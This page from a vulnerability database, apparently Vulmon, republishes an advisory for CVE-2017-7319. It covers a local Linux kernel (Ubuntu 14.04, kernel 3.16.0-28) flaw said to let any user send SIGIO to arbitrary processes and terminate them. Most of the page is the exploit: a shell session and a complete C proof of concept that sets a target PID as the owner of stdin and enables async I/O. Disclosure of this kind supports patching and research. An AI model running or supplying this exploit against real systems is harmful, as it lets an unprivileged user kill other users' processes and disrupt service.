Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2017-7319

Publish Date: 30 Mar 2017

Source

                							

                [+] Title: Linux Kernel (Ubuntu 14.04 LTS) - Send a SIGIO Signal to process
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-7319

Vulnerable Version:
===================

Kernel: 3.16.0-28

Ubuntu: 14.04 LTS

Description:
=============

A vulnerability in the Linux kernel allows any user to send a SIGIO
signal to any process. If the process does not catch or ignore the
signal is will exit.


Vulnerability Type:
=====================

Send a SIGIO Signal To Any Process

Attack Type:
============

Local 

Impact:
========

Kill process

Exploit:
========
#cyborg@cyborg:~$ cd Desktop/
#cyborg@cyborg:~/Desktop$ gcc poc.c -o p0c
#cyborg@cyborg:~/Desktop$ ps
#  PID TTY          TIME CMD
#19592 pts/0    00:00:00 bash
#19631 pts/0    00:00:00 ps
#cyborg@cyborg:~/Desktop$ ./p0c 19592


#include &lt;fcntl.h&gt;
#include &lt;errno.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;

int main(int argc, char *argv[]) {
int s, p;

if(argc != 2) {
fputs("Specify a pid to send signal to.\n", stderr);
 exit(0);
} else {
p = atoi(argv[1]);
}
fcntl(0,F_SETOWN,p);
s = fcntl(0,F_GETFL,0);
fcntl(0,F_SETFL,s|O_ASYNC);
printf("Sending SIGIO - press enter.\n");
getchar();
fcntl(0,F_SETFL,s&amp;~O_ASYNC);
printf("Error.\n");
return 0;
}
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Linux Kernel (Ubuntu 14.04 LTS) SIGIO Signal

Vulmon Search

About

Products

Connect